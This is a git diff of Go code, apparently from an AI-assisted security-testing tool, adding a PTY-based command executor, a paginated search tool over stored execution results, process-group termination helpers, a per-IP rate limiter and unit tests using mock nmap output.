+ _ = ptmx.Close() // 触发读退出 + terminateCmdTree(cmd) + case <-done: + } + }() + defer close(done) + + var outBuilder strings.Builder + var deltaBuilder strings.Builder + lastFlush := time.Now() + flush := func() { + if cb == nil || deltaBuilder.Len() == 0 { + deltaBuilder.Reset() + lastFlush = time.Now() + return + } + cb(deltaBuilder.String()) + deltaBuilder.Reset() + lastFlush = time.Now() + } + + buf := make([]byte, 4096) + for { + n, readErr := ptmx.Read(buf) + if n > 0 { + chunk := string(buf[:n]) + // 统一换行为 \n,避免前端错位 + chunk = strings.ReplaceAll(chunk, "\r\n", "\n") + chunk = strings.ReplaceAll(chunk, "\r", "\n") + outBuilder.WriteString(chunk) + deltaBuilder.WriteString(chunk) + if deltaBuilder.Len() >= 2048 || time.Since(lastFlush) >= 200*time.Millisecond { + flush() + } + } + if readErr != nil { + break + } + } + flush() + + waitErr := cmd.Wait() + return outBuilder.String(), waitErr +} + +// executeInternalTool 执行内部工具(不执行外部命令) +func (e *Executor) executeInternalTool(ctx context.Context, toolName string, command string, args map[string]interface{}) (*mcp.ToolResult, error) { + // 提取内部工具类型(去掉 "internal:" 前缀) + internalToolType := strings.TrimPrefix(command, "internal:") + + e.logger.Info("执行内部工具", + zap.String("toolName", toolName), + zap.String("internalToolType", internalToolType), + zap.Any("args", args), + ) + + // 根据内部工具类型分发处理 + switch internalToolType { + case "query_execution_result": + return e.executeQueryExecutionResult(ctx, args) + default: + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("错误: 未知的内部工具类型: %s", internalToolType), + }, + }, + IsError: true, + }, nil + } +} + +// executeQueryExecutionResult 执行查询执行结果工具 +func (e *Executor) executeQueryExecutionResult(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + // 获取 execution_id 参数 + executionID, ok := args["execution_id"].(string) + if !ok || executionID == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: 
"text", + Text: "错误: execution_id 参数必需且不能为空", + }, + }, + IsError: true, + }, nil + } + + // 获取可选参数 + page := 1 + if p, ok := args["page"].(float64); ok { + page = int(p) + } + if page < 1 { + page = 1 + } + + limit := 100 + if l, ok := args["limit"].(float64); ok { + limit = int(l) + } + if limit < 1 { + limit = 100 + } + if limit > 500 { + limit = 500 // 限制最大每页行数 + } + + search := "" + if s, ok := args["search"].(string); ok { + search = s + } + + filter := "" + if f, ok := args["filter"].(string); ok { + filter = f + } + + useRegex := false + if r, ok := args["use_regex"].(bool); ok { + useRegex = r + } + + // 检查结果存储是否可用 + if e.resultStorage == nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 结果存储未初始化", + }, + }, + IsError: true, + }, nil + } + + // 执行查询 + var resultPage *storage.ResultPage + var err error + + if search != "" { + // 搜索模式 + matchedLines, err := e.resultStorage.SearchResult(executionID, search, useRegex) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("搜索失败: %v", err), + }, + }, + IsError: true, + }, nil + } + // 对搜索结果进行分页 + resultPage = paginateLines(matchedLines, page, limit) + } else if filter != "" { + // 过滤模式 + filteredLines, err := e.resultStorage.FilterResult(executionID, filter, useRegex) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("过滤失败: %v", err), + }, + }, + IsError: true, + }, nil + } + // 对过滤结果进行分页 + resultPage = paginateLines(filteredLines, page, limit) + } else { + // 普通分页查询 + resultPage, err = e.resultStorage.GetResultPage(executionID, page, limit) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("查询失败: %v", err), + }, + }, + IsError: true, + }, nil + } + } + + // 获取元信息 + metadata, err := e.resultStorage.GetResultMetadata(executionID) + if err != nil { + // 元信息获取失败不影响查询结果 + e.logger.Warn("获取结果元信息失败", 
zap.Error(err)) + } + + // 格式化返回结果 + var sb strings.Builder + sb.WriteString(fmt.Sprintf("查询结果 (执行ID: %s)\n", executionID)) + + if metadata != nil { + sb.WriteString(fmt.Sprintf("工具: %s | 大小: %d 字节 (%.2f KB) | 总行数: %d\n", + metadata.ToolName, metadata.TotalSize, float64(metadata.TotalSize)/1024, metadata.TotalLines)) + } + + sb.WriteString(fmt.Sprintf("第 %d/%d 页,每页 %d 行,共 %d 行\n\n", + resultPage.Page, resultPage.TotalPages, resultPage.Limit, resultPage.TotalLines)) + + if len(resultPage.Lines) == 0 { + sb.WriteString("没有找到匹配的结果。\n") + } else { + for i, line := range resultPage.Lines { + lineNum := (resultPage.Page-1)*resultPage.Limit + i + 1 + sb.WriteString(fmt.Sprintf("%d: %s\n", lineNum, line)) + } + } + + sb.WriteString("\n") + if resultPage.Page < resultPage.TotalPages { + sb.WriteString(fmt.Sprintf("提示: 使用 page=%d 查看下一页", resultPage.Page+1)) + if search != "" { + sb.WriteString(fmt.Sprintf(",或使用 search=\"%s\" 继续搜索", search)) + if useRegex { + sb.WriteString(" (正则模式)") + } + } + if filter != "" { + sb.WriteString(fmt.Sprintf(",或使用 filter=\"%s\" 继续过滤", filter)) + if useRegex { + sb.WriteString(" (正则模式)") + } + } + sb.WriteString("\n") + } + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: sb.String(), + }, + }, + IsError: false, + }, nil +} + +// paginateLines 对行列表进行分页 +func paginateLines(lines []string, page int, limit int) *storage.ResultPage { + totalLines := len(lines) + totalPages := (totalLines + limit - 1) / limit + if page < 1 { + page = 1 + } + if page > totalPages && totalPages > 0 { + page = totalPages + } + + start := (page - 1) * limit + end := start + limit + if end > totalLines { + end = totalLines + } + + var pageLines []string + if start < totalLines { + pageLines = lines[start:end] + } else { + pageLines = []string{} + } + + return &storage.ResultPage{ + Lines: pageLines, + Page: page, + Limit: limit, + TotalLines: totalLines, + TotalPages: totalPages, + } +} + +// buildInputSchema 构建输入模式 +func (e *Executor) 
buildInputSchema(toolConfig *config.ToolConfig) map[string]interface{} { + schema := map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{}, + "required": []string{}, + } + + // 如果配置中定义了参数,优先使用配置中的参数定义 + if len(toolConfig.Parameters) > 0 { + properties := make(map[string]interface{}) + required := []string{} + + for _, param := range toolConfig.Parameters { + // 跳过 name 为空的参数(避免 YAML 中 name: null 或空导致非法 schema) + if strings.TrimSpace(param.Name) == "" { + e.logger.Debug("跳过无名称的参数", + zap.String("tool", toolConfig.Name), + zap.String("type", param.Type), + ) + continue + } + // 转换类型为OpenAI/JSON Schema标准类型(空类型默认为 string) + openAIType := e.convertToOpenAIType(param.Type) + + prop := map[string]interface{}{ + "type": openAIType, + "description": param.Description, + } + + // JSON Schema/OpenAI 要求 array 类型必须包含 items,否则 API 报 invalid_function_parameters + if openAIType == "array" { + itemType := strings.TrimSpace(param.ItemType) + if itemType == "" { + itemType = "string" + } + prop["items"] = map[string]interface{}{ + "type": e.convertToOpenAIType(itemType), + } + } + + // 添加默认值 + if param.Default != nil { + prop["default"] = param.Default + } + + // 添加枚举选项 + if len(param.Options) > 0 { + prop["enum"] = param.Options + } + + properties[param.Name] = prop + + // 添加到必需参数列表 + if param.Required { + required = append(required, param.Name) + } + } + + schema["properties"] = properties + schema["required"] = required + return schema + } + + // 如果没有定义参数配置,返回空schema + // 这种情况下工具可能只使用固定参数(args字段) + // 或者需要通过YAML配置文件定义参数 + e.logger.Warn("工具未定义参数配置,返回空schema", + zap.String("tool", toolConfig.Name), + ) + return schema +} + +// convertToOpenAIType 将配置中的类型转换为OpenAI/JSON Schema标准类型 +func (e *Executor) convertToOpenAIType(configType string) string { + // 空或 null 类型统一视为 string,避免非法 schema 导致工具调用失败 + if strings.TrimSpace(configType) == "" { + return "string" + } + switch configType { + case "bool": + return "boolean" + case "int", "integer": + return 
"number" + case "float", "double": + return "number" + case "string", "array", "object": + return configType + default: + // 默认返回原类型,但记录警告 + e.logger.Warn("未知的参数类型,使用原类型", + zap.String("type", configType), + ) + return configType + } +} + +// getExitCode 从错误中提取退出码,如果不是ExitError则返回nil +func getExitCode(err error) *int { + if err == nil { + return nil + } + if exitError, ok := err.(*exec.ExitError); ok { + if exitError.ProcessState != nil { + exitCode := exitError.ExitCode() + return &exitCode + } + } + return nil +} + +// getExitCodeValue 从错误中提取退出码值,如果不是ExitError则返回-1 +func getExitCodeValue(err error) int { + if code := getExitCode(err); code != nil { + return *code + } + return -1 +} diff --git a/security/executor_test.go b/security/executor_test.go new file mode 100644 index 00000000..91cde7c0 --- /dev/null +++ b/security/executor_test.go @@ -0,0 +1,290 @@ +package security + +import ( + "context" + "os" + "path/filepath" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/storage" + + "go.uber.org/zap" +) + +// setupTestExecutor 创建测试用的执行器 +func setupTestExecutor(t *testing.T) (*Executor, *mcp.Server) { + logger := zap.NewNop() + mcpServer := mcp.NewServer(logger) + + cfg := &config.SecurityConfig{ + Tools: []config.ToolConfig{}, + } + + executor := NewExecutor(cfg, mcpServer, logger) + return executor, mcpServer +} + +// setupTestStorage 创建测试用的存储 +func setupTestStorage(t *testing.T) *storage.FileResultStorage { + tmpDir := filepath.Join(os.TempDir(), "test_executor_storage_"+time.Now().Format("20060102_150405")) + logger := zap.NewNop() + + storage, err := storage.NewFileResultStorage(tmpDir, logger) + if err != nil { + t.Fatalf("创建测试存储失败: %v", err) + } + + return storage +} + +func TestExecutor_ExecuteInternalTool_QueryExecutionResult(t *testing.T) { + executor, _ := setupTestExecutor(t) + testStorage := setupTestStorage(t) + executor.SetResultStorage(testStorage) + + // 准备测试数据 + 
executionID := "test_exec_001" + toolName := "nmap_scan" + result := "Line 1: Port 22 open\nLine 2: Port 80 open\nLine 3: Port 443 open\nLine 4: error occurred" + + // 保存测试结果 + err := testStorage.SaveResult(executionID, toolName, result) + if err != nil { + t.Fatalf("保存测试结果失败: %v", err) + } + + ctx := context.Background() + + // 测试1: 基本查询(第一页) + args := map[string]interface{}{ + "execution_id": executionID, + "page": float64(1), + "limit": float64(2), + } + + toolResult, err := executor.executeQueryExecutionResult(ctx, args) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if toolResult.IsError { + t.Fatalf("查询应该成功,但返回了错误: %s", toolResult.Content[0].Text) + } + + // 验证结果包含预期内容 + resultText := toolResult.Content[0].Text + if !strings.Contains(resultText, executionID) { + t.Errorf("结果中应该包含执行ID: %s", executionID) + } + + if !strings.Contains(resultText, "第 1/") { + t.Errorf("结果中应该包含分页信息") + } + + // 测试2: 搜索功能 + args2 := map[string]interface{}{ + "execution_id": executionID, + "search": "error", + "page": float64(1), + "limit": float64(10), + } + + toolResult2, err := executor.executeQueryExecutionResult(ctx, args2) + if err != nil { + t.Fatalf("执行搜索失败: %v", err) + } + + if toolResult2.IsError { + t.Fatalf("搜索应该成功,但返回了错误: %s", toolResult2.Content[0].Text) + } + + resultText2 := toolResult2.Content[0].Text + if !strings.Contains(resultText2, "error") { + t.Errorf("搜索结果中应该包含关键词: error") + } + + // 测试3: 过滤功能 + args3 := map[string]interface{}{ + "execution_id": executionID, + "filter": "Port", + "page": float64(1), + "limit": float64(10), + } + + toolResult3, err := executor.executeQueryExecutionResult(ctx, args3) + if err != nil { + t.Fatalf("执行过滤失败: %v", err) + } + + if toolResult3.IsError { + t.Fatalf("过滤应该成功,但返回了错误: %s", toolResult3.Content[0].Text) + } + + resultText3 := toolResult3.Content[0].Text + if !strings.Contains(resultText3, "Port") { + t.Errorf("过滤结果中应该包含关键词: Port") + } + + // 测试4: 缺少必需参数 + args4 := map[string]interface{}{ + "page": float64(1), + } + 
+ toolResult4, err := executor.executeQueryExecutionResult(ctx, args4) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult4.IsError { + t.Fatal("缺少execution_id应该返回错误") + } + + // 测试5: 不存在的执行ID + args5 := map[string]interface{}{ + "execution_id": "nonexistent_id", + "page": float64(1), + } + + toolResult5, err := executor.executeQueryExecutionResult(ctx, args5) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult5.IsError { + t.Fatal("不存在的执行ID应该返回错误") + } +} + +func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) { + executor, _ := setupTestExecutor(t) + + ctx := context.Background() + args := map[string]interface{}{ + "test": "value", + } + + // 测试未知的内部工具类型 + toolResult, err := executor.executeInternalTool(ctx, "unknown_tool", "internal:unknown_tool", args) + if err != nil { + t.Fatalf("执行内部工具失败: %v", err) + } + + if !toolResult.IsError { + t.Fatal("未知的工具类型应该返回错误") + } + + if !strings.Contains(toolResult.Content[0].Text, "未知的内部工具类型") { + t.Errorf("错误消息应该包含'未知的内部工具类型'") + } +} + +func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) { + executor, _ := setupTestExecutor(t) + // 不设置存储,测试未初始化的情况 + + ctx := context.Background() + args := map[string]interface{}{ + "execution_id": "test_id", + } + + toolResult, err := executor.executeQueryExecutionResult(ctx, args) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult.IsError { + t.Fatal("未初始化的存储应该返回错误") + } + + if !strings.Contains(toolResult.Content[0].Text, "结果存储未初始化") { + t.Errorf("错误消息应该包含'结果存储未初始化'") + } +} + +func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) { + executor, _ := setupTestExecutor(t) + // 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout, + // ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。 + ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second) + defer cancel() + args := map[string]interface{}{ + "command": `(sh -c 'printf x; sleep 120') &`, + "shell": "sh", + } + 
res, err := executor.executeSystemCommand(ctx, args) + if err != nil { + t.Fatalf("executeSystemCommand: %v", err) + } + if res == nil || res.IsError { + t.Fatalf("expected success, got %+v", res) + } + txt := res.Content[0].Text + if !strings.Contains(txt, "后台命令已启动") { + t.Fatalf("unexpected body: %q", txt) + } +} + +func TestPaginateLines(t *testing.T) { + lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"} + + // 测试第一页 + page := paginateLines(lines, 1, 2) + if page.Page != 1 { + t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page) + } + if page.Limit != 2 { + t.Errorf("每页行数不匹配。期望: 2, 实际: %d", page.Limit) + } + if page.TotalLines != 5 { + t.Errorf("总行数不匹配。期望: 5, 实际: %d", page.TotalLines) + } + if page.TotalPages != 3 { + t.Errorf("总页数不匹配。期望: 3, 实际: %d", page.TotalPages) + } + if len(page.Lines) != 2 { + t.Errorf("第一页行数不匹配。期望: 2, 实际: %d", len(page.Lines)) + } + + // 测试第二页 + page2 := paginateLines(lines, 2, 2) + if len(page2.Lines) != 2 { + t.Errorf("第二页行数不匹配。期望: 2, 实际: %d", len(page2.Lines)) + } + if page2.Lines[0] != "Line 3" { + t.Errorf("第二页第一行不匹配。期望: Line 3, 实际: %s", page2.Lines[0]) + } + + // 测试最后一页 + page3 := paginateLines(lines, 3, 2) + if len(page3.Lines) != 1 { + t.Errorf("第三页行数不匹配。期望: 1, 实际: %d", len(page3.Lines)) + } + + // 测试超出范围的页码(应该返回最后一页) + page4 := paginateLines(lines, 4, 2) + if page4.Page != 3 { + t.Errorf("超出范围的页码应该被修正为最后一页。期望: 3, 实际: %d", page4.Page) + } + if len(page4.Lines) != 1 { + t.Errorf("最后一页应该只有1行。实际: %d行", len(page4.Lines)) + } + + // 测试无效页码(小于1) + page0 := paginateLines(lines, 0, 2) + if page0.Page != 1 { + t.Errorf("无效页码应该被修正为1。实际: %d", page0.Page) + } + + // 测试空列表 + emptyPage := paginateLines([]string{}, 1, 10) + if emptyPage.TotalLines != 0 { + t.Errorf("空列表的总行数应该为0。实际: %d", emptyPage.TotalLines) + } + if len(emptyPage.Lines) != 0 { + t.Errorf("空列表应该返回空结果。实际: %d行", len(emptyPage.Lines)) + } +} diff --git a/security/procattr_unix.go b/security/procattr_unix.go new file mode 100644 index 00000000..96d4efe2 --- /dev/null +++ 
// prepareShellCmdSession marks cmd to start in its own session (Setsid), so the
// shell and its children can later be killed as one group on timeout or
// cancellation. Existing SysProcAttr settings are kept. A nil cmd is a no-op.
// The returned error is always nil.
func prepareShellCmdSession(cmd *exec.Cmd) error {
	if cmd != nil {
		attr := cmd.SysProcAttr
		if attr == nil {
			attr = new(syscall.SysProcAttr)
			cmd.SysProcAttr = attr
		}
		attr.Setsid = true
	}
	return nil
}

// terminateCmdTree makes a best-effort attempt to kill cmd together with its
// process group: it sends SIGKILL to the group whose id equals the process id
// (which is the case after Setsid) and, if that fails, kills only the process
// itself. It does nothing when cmd is nil or was never started.
func terminateCmdTree(cmd *exec.Cmd) {
	if cmd == nil {
		return
	}
	proc := cmd.Process
	if proc == nil {
		return
	}
	// A negative pid addresses the whole process group.
	if killErr := syscall.Kill(-proc.Pid, syscall.SIGKILL); killErr != nil {
		_ = proc.Kill()
	}
}
cleanup() { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + for range ticker.C { + rl.mu.Lock() + now := time.Now() + for ip, entry := range rl.entries { + if now.Sub(entry.windowAt) > rl.window { + delete(rl.entries, ip) + } + } + rl.mu.Unlock() + } +} + +// allow 检查指定 IP 是否允许通过 +func (rl *RateLimiter) allow(ip string) bool { + rl.mu.Lock() + defer rl.mu.Unlock() + + now := time.Now() + entry, ok := rl.entries[ip] + if !ok || now.Sub(entry.windowAt) > rl.window { + rl.entries[ip] = &rateLimitEntry{count: 1, windowAt: now} + return true + } + + entry.count++ + return entry.count <= rl.limit +} + +// RateLimitMiddleware 返回 Gin 中间件,对超限请求返回 429 +func RateLimitMiddleware(rl *RateLimiter) gin.HandlerFunc { + return func(c *gin.Context) { + ip := c.ClientIP() + if !rl.allow(ip) { + c.AbortWithStatusJSON(http.StatusTooManyRequests, gin.H{ + "error": "rate limit exceeded, please try again later", + }) + return + } + c.Next() + } +}